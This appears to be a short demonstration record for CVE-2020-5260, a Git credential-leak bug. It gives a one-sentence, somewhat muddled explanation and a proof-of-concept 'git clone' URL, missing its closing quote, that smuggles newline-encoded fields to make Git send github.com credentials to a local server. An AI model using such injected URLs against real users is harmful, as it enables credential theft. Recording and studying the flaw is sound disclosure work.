CVE-2020-5260
CVE-2020-5260 Demonstration Record
- When git executes a command like "git clone https://example.com", it requests the protocol "https" to store credentials for the host "example.com", and when the remote side requests authentication, it appends the returned credentials to the outgoing request.
git clone 'http://localhost:8088/%0ahost=github.com%0aprotocol=https

References:
https://bugs.chromium.org/p/project-zero/issues/detail?id=2021
https://github.com/brompwnie/cve-2020-5260